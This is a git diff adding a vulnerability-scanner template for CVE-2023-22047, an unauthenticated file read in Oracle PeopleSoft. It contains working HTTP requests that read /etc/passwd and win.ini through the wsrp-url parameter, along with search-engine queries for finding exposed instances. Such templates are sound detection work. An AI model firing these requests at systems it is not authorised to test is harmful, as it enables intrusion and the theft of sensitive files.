diff --git a/http/cves/2023/CVE-2023-22047.yaml b/http/cves/2023/CVE-2023-22047.yaml new file mode 100644 index 000000000000..27d1a2bbfb9c --- /dev/null +++ b/http/cves/2023/CVE-2023-22047.yaml @@ -0,0 +1,51 @@ +id: CVE-2023-22047 + +info: + name: Oracle Peoplesoft - Unauthenticated File Read + author: tuo4n8 + severity: high + description: | + Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component- Portal). Supported versions that are affected are 8.59 and 8.60. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all PeopleSoft Enterprise PeopleTools accessible data. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-22047 + - https://x.com/tuo4n8/status/1907279143517266286 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-22047 + epss-score: 0.00635 + epss-percentile: 0.68045 + cpe: cpe:2.3:a:oracle:peoplesoft_enterprise:8.59:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: oracle + product: peoplesoft_enterprise + shodan-query: http.title:"oracle peoplesoft enterprise" + fofa-query: title="oracle peoplesoft enterprise" + google-query: intitle:"oracle peoplesoft enterprise" + tags: cve,cve2023,oracle,peoplesoft,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/RP?wsrp-url=file:///etc/passwd" + - "{{BaseURL}}/RP?wsrp-url=file:///c:\\windows\\win.ini" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - "bit app support" + condition: or + + - type: word + part: content_type + words: + - "content/unknown" + + - type: status + status: + - 200